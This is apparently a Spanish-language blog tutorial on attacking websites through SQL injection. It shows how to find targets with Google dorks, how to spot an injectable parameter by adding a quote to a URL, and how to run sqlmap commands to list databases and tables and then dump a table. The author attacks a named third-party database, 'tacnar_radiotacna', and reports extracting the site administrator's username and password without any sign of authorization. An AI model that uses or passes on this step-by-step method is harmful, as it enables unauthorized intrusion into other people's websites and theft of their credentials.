Lo primero es usar google dorks que son simples comandos de busqueda inteligente mediante google
estas dos son algunas Google dorks que existen pero solamente usaremos estas
intext: es para buscar una web especifica buscara que tenga un texto en específico
inurl: buscara la extensión denominada
buscando elegimos una web a testear y dimos con esta
y testeamos poniendo un simple amperson al final de la URL y damos enter así...
vemos qué al poner el amperson ( ' ) y damos enter arroja un error de SQL una vez veamos esa vulnerabilidad comenzamos con el ataque
Utilizaremos la herramienta SQL MAP - es una tool desarrollada para Linux esta vez la utilizaremos en Windows y accedemos a su directorio.
y con estos primeros comandos damos por comenzado el ataque
sqlmap.py -u [URL] --dbs
Dejamos trabajar el ataque
Aqui ya nos mostro que el motor de base de datos es MySQL y que es parametro injectable
Accedemos a el sistema y nos muestra las base de datos disponibles esta vez atacaremos tacnar_radiotacna
y el comando para atacar la base de dato en especifico es
sqlmap.py -u [url] -D [database Name ] --tables
una vez terminado nos muestra las tablas que contiene la base de datos
una vez en la base de datos buscas sacar los datos de una tabla aqui la que mas me llamo la atención es la de administrador y la atacamos con los siguientes comandos
sqlmap.py -u [url] -D [databaseName] -T [TableName] -- dump
y bien logramos dumpear el usuario y contraseña de administrador de la pagina web.
0 comentarios:
Publicar un comentario